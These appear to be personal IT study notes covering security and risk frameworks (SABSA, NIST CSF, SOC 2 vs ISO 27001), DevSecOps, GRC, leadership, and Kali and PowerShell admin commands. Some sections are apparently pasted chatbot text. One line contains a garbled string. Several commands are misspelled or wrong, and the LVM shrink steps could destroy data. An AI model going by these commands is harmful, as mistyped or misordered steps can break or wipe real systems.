1. Business (Why organization exisit, objectives, goals, strategic thinking, capabilities, processes, functions, organizatinal structure)

2. Data

3. Application(s)

4. Technology

Following domains cut across the typical domains:

1. Security

2. Compliance

Architecture Activities typically when you are performing any sort of change, you have to document the current state and future state. This represents the strategic vision of the organization, where they want to be in 3-5 years time.

Enterprise architecture is about overseeing these changes by defining various architecture principles and standards. Architects then govern those changes to ensure that the standards and principles are being followed.

21.1. TOGAF

21.2. SABSA

SABSA is a framework that supports the business in reaching its goals. It is the leading methodology for developing business operational risk-based architectures. SABSA stands for Sherwood Applied Business Security Architecture.

It provides a framework for developing risk driven enterprise information security and information assurance architectures.

It also helps to deliver security infrastructure solutions that help critical business initiatives.

The SABSA methodology provides guidance for aligning architecture with business value, it also addresses a critical need for greater integration between security and enterprise architecture within organizations.

With SABASA organizations can achieve that important risk reward balance using a range of frameworks, models, methods, and process to manage risk and measure performance.

The SABSA model is the key to this and covers the whole lifecycle of operational capabilities. The SABSA model has six layers:

1. Contextual Architecture: The Business View (Business wisdom and business decision making)

2. Conceptual Architecture: The Architect’s vision (The 'big picture', business attributes profiel and risk objectives)

3. Logical Architecture: The Designers Vision (Information, services, processes, applications)

4. Physical Architecture: The builders/constructors view(Data mechanisms, infrastructure, platforms)

5. Component Architecture: The Trademan’s View (Products, Tools, Specific Standards, Technologies)

6. Security Services Management Architecture: The Service Manager’s view (Service management activities, processes and monitoring)

Each of the layers of the architecture model are supported by a vertical analysis based on six key questions

• What

• Why

• How

• Who

• Where

• When

The SABSA framework is flexible, scalable and applicable to any industry sector. Instead of replacing other risk based standards, it can be combined with TOGAF, COBIT and ITIL to create an integrated compliance framework.

SABSA provides organization with "enterprise operational risk management architecture" that can be completely tailored to a specific business model.

SABSA’s governance model provide a control feedback loop

1. Strategy & Planning

2. Design

3. Implement

4. Management & Measure

21.3. Zachman

21.4. DODAF

21.5. MODAF

21.6. Solution Architecture

AWS Systems Manager == Microsoft SCCM AWS Network Firewall == Microsoft Azure Firewall

22. Information Security Frameworks

22.1. ISO2700x

22.2. NIST Cyber Security Framework(CSF)

The NIST Cybersecurity Framework (CSF) 2.0 is a comprehensive guidance document provided by the National Institute of Standards and Technology (NIST). It serves as a valuable resource for industry, government agencies, and other organizations to manage and reduce cybersecurity risks. Here are the key points about CSF 2.0:

1. High-Level Cybersecurity Outcomes: CSF 2.0 offers a taxonomy of high-level cybersecurity outcomes that can be applied by any organization, regardless of its size, sector, or maturity. These outcomes help organizations better understand, assess, prioritize, and communicate their cybersecurity efforts.

2. Adaptability and Flexibility: Unlike a rigid set of rules, the CSF does not prescribe how outcomes should be achieved. Instead, it links to online resources that provide additional guidance on practices and controls. This adaptability allows organizations to tailor their approach based on their unique context and needs.

3. Risk Management Focus: The CSF assists organizations in managing and reducing cybersecurity risks. It aligns with enterprise risk management principles and helps organizations address risk effectively.

4. Profiles and Tiers: CSF 2.0 describes a five-step process for creating and using Organizational Profiles. These profiles compare an aspirational Target Profile to an assessed Current Profile, enabling organizations to identify gaps and develop action plans⁴.

In summary, the NIST Cybersecurity Framework 2.0 provides a strategic framework for organizations to enhance their cybersecurity posture, regardless of their level of maturity or technical sophistication¹²³.

Sources:

1. NIST Cybersecurity Framework 2.0. https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=957411.

2. The NIST Cybersecurity Framework (CSF) 2.0. https://csrc.nist.gov/pubs/cswp/29/the-nist-cybersecurity-framework-csf-20/final.

3. NIST Cybersecurity Framework 2.0: Resource & Overview Guide. https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.1299.pdf.

4. The NIST Cybersecurity Framework (CSF) 2. https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf.

22.3. Key Functions

Identify

Involves determining your IT risks and securing the necessary budget and resources to defend your digital resources. Your decisions should be based on the contextualized threat intelligence you collect. In addition to assessing internal IT risk, this goal should include analyzing the security competence of third-party vendors and any customers with which you exchange data. It’s critical to identify those that represent an elevated risk to your organization’s systems and data. It’s also important to bring in threat intelligence on the risks your competitors face because you likely face similar threats.

Protect

Is about deploying the required security controls (technologies and processes) to defend your digital assets, and then validating that these controls align to the risks you identified. For example, controls should be applied to set up defenses against exploit kits, as well as undisclosed zero-day and embargoed vulnerabilities, as identified by your threat intelligence platform. You also need to safeguard against the exploitation of high-risk vulnerabilities in your technology stack.

Detect

Revolves around your ability to block attacks before they impact digital assets. Threat intelligence helps by enabling you to identify and research the evolution and trends of malware families with high risk to your organization. In addition to identifying the security patches to apply, you will also gain intelligence on which systems are most susceptible and which are being actively targeted and exploited.

Respond

Refers to how fast your security team reacts to breaches; even the strongest security postures do not offer a 100% guarantee that cyberattacks will not succeed. Threat intelligence assists in the response process by evaluating the data exposure and the digital asset damage your organization is facing. This can then be reported to all affected parties and stakeholders — not only for remediation teams, but also for non-technical personnel who may need to prepare for the impact on day-to-day operations and the potential impact on vendors, clients, and perhaps even the overall market in which you operate.

Recover

Is all about how quickly the damage inflicted upon the organization’s technology stack and surrounding ecosystem can be mitigated, including any and all operations that must be restored as the security incidents are being closed out. Threat intelligence helps pinpoint the specific measures the security team should take in order to quarantine infected systems and inoculate the malicious elements coursing through the environment. The ultimate goal in the case of a breach, of course, is to quickly and safely restore the digital assets back to fully functioning systems with all security measures intact.

Top two are proactive measures, and bottom three are reactive measures.

22.4. SOC2

22.5. SOC2 vs ISO27001

Area	SOC 2	ISO 27001
Structure	Audit Framework	Certification
Geography	US-Based	International
Avg Timeline	6-12 Months	6-24 Months
Avg Cost of Audit (for startups)	$15K+	$20K+
What is Audited?	The design of controls at a point in time (Type 1) or the design and operating effectiveness of controls over a period of time (Type 2)	The operational effectiveness of your Information Security Management System at a point in time
Requirements	80-100 controls to satisfy 35 criteria (for Security only)	10 requirements with 114 suggested controls
Accreditation Body	AICPA (American Institute of Certified Public Accountants)	ANAB (ANSI-ASQ National Accreditation Board) in the US
Result of Audit	SOC 2 Attestation Report (SOC 2 is not a certification)	ISO Report and/or ISO Certification to be made public
Expiration	You’ll want to receive a new SOC 2 report every year which means you’ll need to be audited every year	Recertification happens every 3 years, but there are surveillance audits after year 1 and year 2 in between recertification audits
Frequency of Audit	Based on the review period (typically annual)	Recertification audit every 3 years and surveillance audit (“lighter audit”) annually between recertification audits

nformation Security Management Systems (ISMS) Perhaps the most significant difference between SOC 2 and ISO27001 is that the latter requires an Information Security Management System (ISMS).

An ISMS is a management system focused on securing information. It reduces your risk of cyber attacks, helps you understand your threat landscape, and protects your confidentiality with policies, procedures, and technical controls defined and enforced within the system.

Your Chosen Markets If you’re getting requests for a SOC 2 report, chances are you’re working with US companies. If you’re asked for ISO 27001, you’ve probably gone international. If you are planning to expand in one of these markets, you may also need to expand your security program to comply with both.

Requirements, Criteria, and Controls ISO 27001 has 10 requirements with 114 suggested controls, spanning encryption, firewalls, infosec policies, physical access controls, and much more. ISO 27001 Annex A is where you’ll find the prescriptive list of controls you can put in place to satisfy the requirements.

For example, “10.2 – Demonstrate how the organization shall continually improve the suitability, adequacy and effectiveness of the information security management system” is a high-level requirement. It doesn’t specify how you demonstrate ongoing improvement, but it requires that you do demonstrate it.

SOC 2, on the other hand, is a set of 64 criteria split across five trust services criteria (TSC) or categories. Your organization selects which TSC to include in your audit/report (with security being the foundational one, as it’s the largest in terms of the amount of individual criteria and the only required TSC to include in a SOC 2 audit/report). It’s important to note that these criteria are not controls, and so it is up to the organization to design and implement their own controls to satisfy these criteria. This means SOC 2 is much less prescriptive than ISO 27001 and more open for interpretation.

Audit Result: Attestation Report vs. Certification Once you’ve designed and implemented your controls to satisfy the SOC 2 criteria, you prove it by completing an audit with a licensed CPA firm, resulting in the official SOC 2 attestation report. There are two types of audits and reports: a SOC 2 Type I audit that covers the design of your controls at a single point-in-time and a SOC 2 Type II audit that attests to the design and operating effectiveness of your controls over a period of time (usually 6-12 months). Type II is more commonly requested by clients and (obviously) more extensive. Either type of SOC 2 audit results in an attestation report where the auditor gives an opinion on your compliance. The audit is conducted and the resulting report is generated annually – consistent with the period of time the report covers.

With ISO 27001, you’ll need a certification instead, which you receive after a point-in-time audit. The end result is a certificate that outlines the specific requirements met. Recertification happens every 3 years, with annual surveillance audits during the years in between.

It’s worth highlighting that with ISO 27001, you may only get a certificate, which your customers may like, but this doesn’t really describe what’s happening with specific controls at your organization. Therefore, companies often supplement their ISO 27001 certificate with a SOC 2 report, so their customers can also have the benefit of seeing the detailed system description and controls.

Cost Getting compliant can get pricey and be time-consuming, but SOC 2 typically costs less because it doesn’t include an ISMS. Experts say the cost to become ISO 27001 compliant can be up to about 50% more than SOC 2.*

23. Dev, Sec, Ops

Development, Operations, and Security operate as silos.

CiCd or Continuous Integration and Continuous Delivery is key for DevSecOps

Figure 3. Know your application

The benefits of DEVSECOPS are:

• Observability throughout the varios stages of a user story. IDEA -→ CODE -→ BUILD -→ DEPLOY -→ MANAGE -→ LEARN

• Traceability

• Confidence

• Compliance

Some activities to consider for DevSecOps:

• Threat Modeling

• Attack Surface Evaluation

• Static & dynamic code analysis

• Penetration Testing

• Security Code Reviews

• Fuzz Testing

Teams who are considering DevSecOps should think about:

• Frameworks & Tools

• Automating core security tasks

• Embedding securit controls and processes

Five principles for Securing DevOps

• Automate Security Into you DevOps process

• Integration to fail quickly

• No false Alarms

• Build Security Champions

• Keep Operational Visibility

23.1. OWASP Top 10 App Sec Risks

1. Injection

2. Broken Authentication

3. Sensitive Data Exposure

4. XML External Exposures (XXE)

5. Broken Access Control

6. Security Misconfiguration

7. Cross Site Scripting

8. Insecure Deserialization

9. Using component with known vulnerabilities

10. Insufficient Logging/Monitoring

23.2. Real-Word Top 10 Attacks

1. Direct Object Reference

2. Forceful Browsing

3. Null Byte Attack

4. Command Injection

5. Feature Abuse

6. Evasion Techniques

7. Subdomin Takeover

8. Misconfiguration

9. Cross Site Scription

10. SQL Injection

24. Governance, Risk, & Compliance

A documented process must be followed to ensure compliance to information security policy and to highlight risks that might be introduced when the requirements are not adhered to. Some of the GRC functions are:

• Enterprise Risk Management

• IT Risk Management

• Integrated Risk Management

• Operational Risk Management

• Enterprise GRC Management

• Vendor/Third-Party Risk Management

• Business Continuity

• Financial Audit

• Compliance

24.1. Lines of Defence

In 2013 The Institute of Internal Auditors released a position paper titled The Three Lines of Defence In Effective Risk Management and Contol. This paper highlighted how an organization can manage risk and how the risk gaps can be captured across the orgnization just in case it was missed at the front lines.

If the frontline/operational teams miss it, then governance teams can pick it up, and if governance teams miss it then internal audit will catch that. After internal audit it is the regulators.

In a mature organization, 80% of the risks are handled by the frontline/operational teams, leaving little for governance and internal audit teams to identify.

24.2. Enterprise Risk Management

• Not necessarily covered by insurance

• Multi-dimensional assessment

• Analyzes material risks and how they relate

• Spans the entire organization ("holistic")

• Proactive & continuous

• Considers both upside and downside

• Focuses on business goals, adding value and more

• Embedded in culture and mindset

24.3. IT Risk Management

Here are some risk management frameworks that organizations commonly use:

1. ISO 31000:

   1. ISO 31000 is a widely recognized international standard for risk management. It provides principles, a framework, and a process for managing risk. Organizations of any size, activity, or sector can use ISO 31000 to enhance their risk management practices. However, it cannot be used for certification purposes¹.

2. Risk Management Framework (RMF):

   1. The RMF is a structured set of management goals and guidelines that define how an organization interacts with information security, privacy, and risk. It enables organizations to identify, assess, and analyze risk effectively. The RMF typically follows these steps:

      1. Categorize: Identify and categorize information systems based on their impact levels.

      2. Select: Select appropriate security controls.

      3. Implement: Implement the selected controls.

      4. Assess: Assess the effectiveness of the controls.

      5. Authorize: Obtain authorization to operate.

      6. Monitor: Continuously monitor and maintain the controls².

3. Industry-Specific Frameworks:

   1. Various industries have their own risk management frameworks tailored to their unique needs. For example:

      1. NIST SP 800-37: Used by U.S. federal agencies.

      2. COSO ERM Framework: Focused on enterprise risk management.

      3. FAIR (Factor Analysis of Information Risk): Quantitative risk assessment framework.

      4. ITIL (Information Technology Infrastructure Library): Includes risk management practices for IT services.

      5. COBIT (Control Objectives for Information and Related Technologies): Addresses IT governance and risk management⁴.

4. Internal Organizational Frameworks:

   1. Many organizations develop their own customized risk management frameworks based on their specific needs, industry, and risk appetite.

Remember that the choice of framework depends on the organization’s context, industry, and risk tolerance. Each framework has its strengths and limitations, so organizations often tailor them to fit their unique requirements. 😊👍

If you’d like more details about any specific framework or need further assistance, feel free to check!¹²⁴

Sources

1. ISO - ISO 31000 — Risk management. https://www.iso.org/iso-31000-risk-management.html/.

2. What Is A Risk Management Framework (RMF)? 2024 Guide - SelectHub. https://www.selecthub.com/risk-management/risk-management-framework/.

3. What are the different types of risk frameworks?. https://advancedsecurity.com/risk-management-framework-rmf/what-are-the-different-types-of-risk-frameworks/.

4. Risk Management Framework (RMF): Overview + Best Practices - Drata. https://drata.com/blog/risk-management-framework.

5. Risk Management Framework (RMF) Definition - Investopedia. https://www.investopedia.com/articles/professionals/021915/risk-management-framework-rmf-overview.asp.

24.4. Integrated Risk Management

Integrated Risk Management (IRM) is a holistic approach to managing risks across an organization, combining multiple risk management disciplines into a single, coordinated framework. IRM considers all types of risks, including strategic, operational, financial, compliance, and reputational risks, and aims to identify, assess, mitigate, and monitor them in an integrated manner.

The key characteristics of IRM include:

1. Comprehensive: IRM considers all risks, across all business units and functions.

2. Integrated: IRM combines different risk management disciplines, such as enterprise risk management, operational risk management, and compliance risk management.

3. Holistic: IRM views risks in the context of the organization’s overall strategy and objectives.

4. Dynamic: IRM continuously monitors and updates risk assessments and mitigation strategies.

5. Collaborative: IRM involves stakeholders across the organization, including risk managers, business leaders, and board members.

IRM aims to:

1. Identify and prioritize risks

2. Assess risks in a consistent and systematic way

3. Develop and implement effective risk mitigation strategies

4. Monitor and review risks and controls

5. Provide risk information to support strategic decision-making

The benefits of IRM include:

1. Improved risk oversight and governance

2. Enhanced risk management efficiency

3. Better alignment of risk management with business objectives

4. Increased transparency and reporting

5. Reduced risk of unexpected losses

Overall, IRM enables organizations to manage risks in a more effective and efficient way, supporting long-term success and sustainability.

24.5. Opertional Risk Management

Operational risk management (ORM) is a systematic approach to identify, assess, and mitigate the risks associated with an organization’s operations. It involves identifying potential risks, evaluating their likelihood and impact, and implementing controls to reduce or eliminate them. ORM aims to minimize losses and maximize opportunities, ensuring the organization can achieve its objectives.

Key components of operational risk management include:

1. Risk identification: Identifying potential operational risks through techniques like scenario analysis, root cause analysis, and risk assessments.

2. Risk assessment: Evaluating the likelihood and impact of identified risks, using techniques like probability and impact matrices.

3. Risk prioritization: Prioritizing risks based on their likelihood and impact, to focus on the most critical ones.

4. Risk mitigation: Implementing controls and mitigation strategies to reduce the likelihood or impact of prioritized risks.

5. Risk monitoring and review: Continuously monitoring and reviewing the risks and controls, to ensure their effectiveness and identify new risks.

6. Risk reporting: Reporting operational risk information to stakeholders, including management and the board of directors.

7. Risk governance: Establishing clear roles, responsibilities, and policies for operational risk management.

Effective operational risk management can help organizations reduce losses, improve efficiency, and enhance their overall resilience.

The top operational risks in banking include:

• Cybersecurity risks: Even as financial institutions ramp up their cybersecurity efforts, cyber risks, including ransomware and phishing, have become more frequent and more effective, posing a major risk to financial institutions.

• Third-party risk: Increasingly, financial institutions are relying on third-party providers, which means they have to thoroughly identify, evaluate, and control third-party risks throughout the lifecycle of their relationships with those companies. However, financial institutions also have to identify and evaluate the risks associated with the vendors, suppliers, and contractors that their third-party vendors use.

• Internal fraud: Losses from fraud inside a financial institution can stem from misappropriation of assets, forgery, tax non-compliance, bribes, and theft.

• External fraud: Fraud committed by third parties includes check fraud, theft, hacking, breaching system security, and data theft.

• Business disruption and systems failures: Hardware or software system failures, power failures, and disruption in telecommunications can interrupt the financial institution’s business operations and cause financial loss.

Operational risk management, which entails incorporating operational risk management practices into a financial institution’s systems, processes, and culture, should be at the center of a financial institution’s operations. Operational risk management is an ongoing process that involves risk assessment, risk decision making, and adopting internal controls to help financial institutions mitigate or avoid risk.

24.6. Enterprise GRC Management

24.7. Vendor/Third-Party Risk Management

24.8. Business Continuity

24.9. Financial Audit

24.10. Compliance

Compliance function ensures that all the Industry, Governmental, & Financial requirements are adhered to.

24.10.1. Assesment Tools

Automating security assessments using CloudBXPC-W3W-TYZ-9PP-BO4G Katana: https://www.microsoft.com/security/blog/2021/08/19/automating-security-assessments-using-cloud-katana/

25. Observability

Network Observability is the key to maintaining a secure, resilient, agile, availability, and programmability.

To establish this the network should be broken down into:

Areas: Areas where observability is required Capability: Which capability we are after in each of the areas Technology/Solution: Which technology/solution will help us realize this capability

The image above depicts how you should organize your area, capability, and technology matrix.

26. Leadership

Having the right leadership at every level is key to the success of an organization. This starts all the way from the top. Leading a team is just like tending to a garden, that needs constant grooming, support and care. It is this capability that helps the leader identify any issues and correct them before they get out of control.

Building high performing teams entirely depends on the leader. The leader must understand they they have to deliverables are and then build their team based on business requriements to ensure alignment with business.

One, is that the leader hires team members who are domian experts and also have experience developing high performing teams.

Two, is that the leader is also a domain expert and is willing to groom and coach team members into the role they need to be in.

In each case leader is they key, they should know enough about business and domains to lead and coach the teams.

26.1. Leader vs Manager

A manager typically ensures tasks are assigned and delivered on time. A leader on the other hand is someone who provides direction to the organization and the team. A Leader invests time and energy in grooming and coaching their team members to be successful in their career at the current organization and also in their future endavours.

26.2. Why do team members leave?

Here are some of the reasons that might cause team members to leave an organization.

26.2.1. Not cultivating the team member

Giving someone a title does not mean that they know exactly what is required. To set the team member(s) for success the leader has to understand which key ingredients the team member is missing to fulfill the role. Then come up with a plan to to coach them to build and/or strengthen those capabilities and slowly move them into higher roles.

Inexperienced leaders often make this mistake of promoting a team member to a role without any coaching and skillset development. Nine out of ten times, the leader has pretty much set the team member for failure and this also becomes the cause of stress and anxiety for the team member. The team member ends up in meeting where they are expected for deliverables which they have never produced and have no idea on how to produce them. Since the leader themselves are inexperienced they have no way of salvaging the situation either.

Eventually team members start looking for ways out of the team or the organization.

26.2.2. Not listening to experienced team members

Following are the situations when a leader does not listen to an experience team member:

• Afraid of leading and bringing about the change, do not want to rock the boat

• Are incapable of visualizing the big picture as they lack the knowledge and experience

• Are in the wrong role, hence the hesitation

• Don’t have a vision

• Don’t have a strategy

• Don’t have the self-confidence

26.2.3. Teams are not aligned with the organizational goals

It is the leaders role to ensure team members are engaged. Engagement is brought about when the leader:

• Ensures that the team is aware of the organizational goals and

• Has put forth a plan for the team to execute upon

• Engages with the team to track the progress and make changes as required

• Ensures that their immediate teams, if they are managing multiple teams, are aware of of each other’s goals and deliverables

26.3. Important qualities of a leader

Following are some of the qualities a leader should have:

• Domain Expert, which means the leader is able to:

  • Set vision/goals for the team

  • Provide career advise to team members

  • Coach and train team members and set them up for success at the current organization and for their future

  • Roll up the sleeves and work with the team

  • Provide direction to the team

  • Leverage their past exeprience

• Understand the difference between Managing People vs Leading People

• Good listener

• Familiar with Project delivery methodologies

27. Kali Reference

1. Add user and give root privs

   1. login as root and the user

      useradd -m <username>

   2. Assign a password to the user

      passwd <username>

   3. Add a user to sudoers file

      usermod -a -G sudo <username>

   4. Change user shell to bash

      chsh -s /bin/bash <username>

2. Shrink partition

   1. Login to your system as root and open a terminal window. Lets assume the paritition is /dev/xxx/yyy and is currently 40G, and you want to reduce it to 30G

      df -k
      unmount /dev/xxx/yyy
      e2fsck -fy /dev/xxx/yyy
      resize2fs /dev/xxx/yyy 30G
      lvreduce -L 30G /dev/xxx/yyy
      resize2fs /dev/xxx/yyy
      mount /dev/xxx/yyy

3. Expand partition

Lets assume the file system is /dev/xxx/yyy. Current size is 10G and you want to add another 10G .. Show space in current Volume group, look for Free PE/Size and make note of it, in our case it

vgdisplay

1. Extend the logical volume

   lvextend -L+10G /dev/xxx/yyy

2. Resize the filesystem

   resize2fs /dev/xxx/yyy

28. Business Resilience

For a business to be sustainable it has to be able to bear any hardship it faces. These hardships or risks can be financial, environmental, labor, suppliers, intellectual property , and technical. Hence every business has to ensure it has documented plans on how to address the risks and become resilient.

In order for a business to be resilient, it has to ensure it follows Business Continuity Management(BCM) strategies and methodologies. BCM itself can be split into two general areas Business Continuity and Disaster Recovery.

28.1. Business Continuity

Some of the strategies and methodologies that a business implements are directly associated to

28.1.1. Conference Call Guidelines

1. Use a pre-conferencing/green room/waiting room (This is already configured for Teams Meetings)

2. Don’t re-use conference access codes (This is already configured for Teams Meetings)

3. Don’t record the meeting unless necessary

4. Do a role call to ensure only invited attendees are on the call

5. Before sharing your screen ensure you close all confidential files/applications

6. If it is a sensitive meeting, and you record it, ensure the recording is encrypted and stored in a location with limited user access

7. If the recording is saved on the web platform ensure you download the recording and delete it from the web platform

References . NIST Guidance: https://www.nist.gov/system/files/documents/2020/03/17/Conference%20Call%20Security%20Graphic.pdf

28.1.2. Remote Working Guidelines

Employees

1. Greet your team members using TEAMS chat feature

2. Use camera when in meetings

3. When in doubt call the team member

4. Keep the team connected using Teams Chat and other means as per team norms.

5. Over communicate

6. Lock your computer when you walk away from your computer (Windows Key + L)

7. Inform you team if you are going to be away from your computer for an extended period

8. Avoid multitasking

Leader

1. Establish team norms:

   1. Do we meet more frequently as a team? When? How long?

   2. If we use an online meeting platform, does everyone turn on their video camera?

   3. How do we ensure people are present and not multitasking?

   4. What is the recommended response time to a text or email? Should we use the phone more?

   5. How will we share sensitive information? Email?

2. Ensure your team knows what is the best method to contact you

3. Conduct Morning Huddles

4. Frequent Check-ins

5. Use Teams to share for quick feedback

References

1. https://www.forbes.com/sites/danpontefract/2020/03/01/in-the-wake-of-coronavirus-heres-how-to-lead-remote-employees/#1d44ec7152a4

2. https://www.timedoctor.com/blog/run-a-remote-team/

28.2. Disaster Recovery

29. Online Protection

The purpose of the internet was to connect networks for information sharing. However, the marketers and service providers have embraced it.

29.1. Marketing Organizations

Marketing organizations offer free services to get access to your information such as:

• Age

• Gender

• Income

• Home address

• Shopping preferences

• Personal interests

• etc.

This helps them target ads to lure you into making impulse purchases. By offering you free services, the marketing companies such as Google, Facebook, and others are after your personal information, which they sell to organizations to target their products and services to you.

29.2. Service Providers

All organizations who traditionally had brick and mortar presence are moving to online presence. When you start engaging with these business online you need to have a way to identify yourself, which is usually via a userid and password. Depending on the information these organizations hold about you, if your userid and password get compromised this could have negative consequences on you.

29.3. What should I do to protect myself online?

It is key that we practise good hygiene when using online services:

• Use a password that is at least 13 characters long. If the site allows, try to use a passphrase instead, such as "My cat does not chase mice!95"

• Use a password manager to store your passwords this avoids the urge to write passwords on paper/yellow sticky notes.

• No passwords can be same

• Enable Multifactor Authentication where possible

• Ensure you are using the latest versins of all software on your computers

• When re-cycling or selling your electronic device make sure you factory reset it so that none of your information stays on it.

• Think before you click on links.

• Only open emails from people you know

• Ensure you are using the latest version of the operating systems on all your devices.

  • Windows Computers: Latest version of Windows10 and associated patches

  • Apple Mac Computers: Latest version of Mac OS

  • Apple iPad: : Latest version of iOS

  • Apple iPhones: Latest versino of iOS

  • Apple Watch: Latest version of WatchOS

  • Android Phones: Latest version of Android OS

  • Android Tablets: Latest version of the Android OS

30. Powershell Reference

1. Powershell Logging

2. Powershell 7

3. Windows Powershell Cookbook

4. Complete Powershell in one video-beginner to professional powershell scripting

5. Get-adobject

6. Lazy Windows Administrator

7. How to create and run a PowerShell script file on Windows 10

8. Command Line Process Auditing

9. Configure IP Address on a computer

   New-NetIPAddress -InterfaceAlias Ethernet -IPAddress 10.10.10.10 -PrefixLength 24 -DefaultGateway 10.10.10.1

10. Configure DNS on a computer

    Set-DNSClientServerAddress -InterfaceAlias "Ethernet" -ServerAddress 172.16.0.10

11. IP v6 - Current Status

    Get-NetAdapterBinding -ComponentID ‘ms_tcpip6’

12. IP v6 - Disable

    Get-NetAdapterBinding -ComponentID ‘ms_tcpip6’ | Disable-NetAdapterBinding -ComponentID ‘ms_tcpip6’ -PassThru

13. Rename computer

    Rename-Computer <new name>

14. Restart computer

    Restart-Computer

15. Shutdown computer

    Shutdown-Computer

16. Set log application, system, and security log files to 100MB and roll over after 21 days

    limit-eventlog -logname "application" -maximumsize 100MB -retentiondays 21 -overflowaction overwriteolder
    limit-eventlog -logname "security" -maximumsize 100MB -retentiondays 21 -overflowaction overwriteolder
    limit-eventlog -logname "system" -maximumsize 100MB -retentiondays 21 -overflowaction overwriteolder

17. Enable Remote Desktop

    set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0

18. Add firewall rules to allow Remote Desktop traffic

    Enable-NetFirewallRule -DisplayGroup “Remote Desktop”

19. Check for updates and install updates

    get-hotfix|grid-view
    Install-Module -Name PSWindowsUpdate
    Get-Package -Name PSWindowsUpdate
    Install-WindowsUpdate -MicrosoftUpdate -AcceptAll -AutoReboot

20. Set Date & Timezone

    set-date "1/1/2020 10:10 PM"
    (get-WmiObject win32_timezone).caption
    TZUTIL /s "Eastern Standard Time"

21. Add a first domain controller

    Install-windowsfeature -name AD-Domain-Services -IncludeManagementTools
    Get-Command -Module ADDSDeployment
    Create Root Domain: Install-ADDSForest -DomainName “corp.momco.com”

22. Add DNS Primary Zone

    Add-DnsServerPrimaryZone -NetworkID 192.168.64.0/24 -ZoneFile “192.168.64.2.in-addr.arpa.dns”
    Add-DnsServerForwarder -IPAddress 8.8.8.8 -PassThru

23. Confirm DNS is working

    Test-DnsServer -IPAddress 192.168.64.2 -ZoneName "corp.momco.com"

24. Add computer to a domain

    Add-Computer -DomainName <domain name>

25. Add a second domain controller

    Add-WindowsFeature AD-Domain-Services
    Install-ADDSDomainController -InstallDns -Credential (Get-Credential "CORP\Administrator") -DomainName "corp.contoso.com"

26. Locate FSMO Roles

    Get-ADForest DOMAINNAME | FT SchemaMaster
    Get-ADForest DOMAINNAME | FT DomainNamingMaster
    Get-ADDomain DOMAINNAME | FT PDCEmulator
    Get-ADDomain DOMAINNAME | FT InfrastructureMaster
    Get-ADDomain DOMAINNAME | FT RIDMaster

27. Add FSMO Role to a new computer

    Move-ADDirectoryServerOperationMasterRols - Identity NEW-DC -OperationMasterRole RIDMaster,InfrastrcutureMaster,DomainNamingMaster -Force

28. List all accounts where password is not set to expire

    Search-ADAccount -PasswordNeverExpires | out-gridview

29. List all accounts not used in last 90 days & Export to CSV

    Import-Module ActiveDirectory
    Search-ADAccount –AccountInactive -TimeSpan 90.00:00:00 -UsersOnly | Select -Property Name,DistinguishedName,LastLogonDate |	Export-CSV "C:\\InactiveADUsers.csv" -NoTypeInformation -Encoding UTF8

30. Create a VM

    New-VM -MemoryStartupBytes 2048MB -Name VMNAME -path "d:\folder" -VHDPath "d:\folder\name.vhdx"

31. Assign VM Network

    Get-VM -Name VMNAME | Get-VMNetworkAdapter | Connect-VMNetworkAdapter -Swtichname 'SWITCHNAME'

32. Checkpoint a VM

    Get-VM | Checkpoint-VM

33. Ping alternate

    Test-NetConnection
    Test-NetConnection 8.8.8.8

34. Traceroute alternative

    Test-NetConnection www.bing.com -traceroute

35. Telnet to a port

    Test-NetConnection www.bing.com -Port 80
    Test-NetConnection smtp.com -Port 25

36. View All services in a GUI

    Get-Service | Out-Gridview

37. Service management

    Stop-Service <service name>
    Start-Service <service name>
    Restart-Service <service name>
    Set-Service <service name> <-Change Service properties

38. Enable/Disable Firewall

    set-netfirewallprofile -profile domain,public,private -enabled true/false

39. Add a firewall rule

    New-NetFirewallRule -DisplayName "Allow Inbound Port80" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow
    New-NetFirewallRule -DisplayName "Block Outbound Port80" -Direction Outbound -LocalPort 80 -Protocol TCP -Action Block

40. Password Reset

    $newpwd = ConvertTo-SecureString -String "P@ssw0rd" -AsPlainText -Force
    Set-ADAccountPassword ACCOUNTNAME -NewPassword $newpwd -Reset
    Set-ADAccountPassword ACCOUNTNAME -NewPassword $newpwd -Reset -PassThru | Set-ADuser -ChangePasswordAtlogon $True

41. Install RSAT Tools:

    Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online
    or
    ADD-WindowsFeature RSAT-Role-Tools

42. Change color of error text:

    $host.PrivateData.ErrorForegroundcolor = 'green'

43. Help for all commandlets with service in the name:

    help *service*

44. Update help with latest modifications from Microsoft:

    Update-Help

45. Show all help about a commandlet:

    Help <cmdlet> -full

46. Show online help about a commandlet:

    Help <cmdlet> -online

47. To show a gui for a cmdlet:

    Show-command <cmdlet>

48. Show event log settings:

    get-eventlog -list

49. Show top ten biggest processes:

    Get-process| sort-object -property pm -descending | select-object -first 10

50. Get all objects in a cmdlet:

    Get-service|get-member

51. Show services that are running:

    Get-service| where-object -FilterScript { $_.Status -eq 'Running'}

52. Gsv is alias for get-service

53. ? Is alias for where

54. Find out what cmdlet an alias is:

    Help gsv or get-alias gsv

55. List all alias:

    Gal

56. The Get-PSProvider cmdlet gets the Windows PowerShell providers in the current session. You can get a particular drive or all drives in the session. Windows PowerShell providers let you access a variety of data stores as though they were file system drives. The Get-PSDrive cmdlet gets the drives in the current session. You can get a particular drive or all drives in the session. This cmdlet gets the following types of drives:

    1. Windows logical drives on the computer, including drives mapped to network shares.

    2. Drives exposed by Windows PowerShell providers (such as the Certificate:, Function:, and Alias: drives) and the HKLM: and HKCU: drives that are exposed by the Windows PowerShell Registry provider.

    3. Session-specified temporary drives and persistent mapped network drives that you create by using the New-PSDrive cmdlet. Beginning in Windows PowerShell 3.0, the Persist parameter of the New-PSDrive cmdlet can create mapped network drives that are saved on the local computer and are available in other sessions. For more information, see New-PSDrive. Also, beginning in Windows PowerShell 3.0, when an external drive is connected to the computer, Windows PowerShell automatically adds a PSDrive to the file system that represents the new drive. You do not need to restart Windows PowerShell. Similarly, when an external drive is disconnected from the computer, Windows PowerShell automatically deletes the PSDrive that represents the removed drive.

57. Show contents of a file:

    Get-content or gc

58. List modules available:

    Get-module -List Available

59. To import a module:

    import-module <modulename>

60. To list all commands available in a module:

    get-command -module <modulename>

61. Add roles & Features

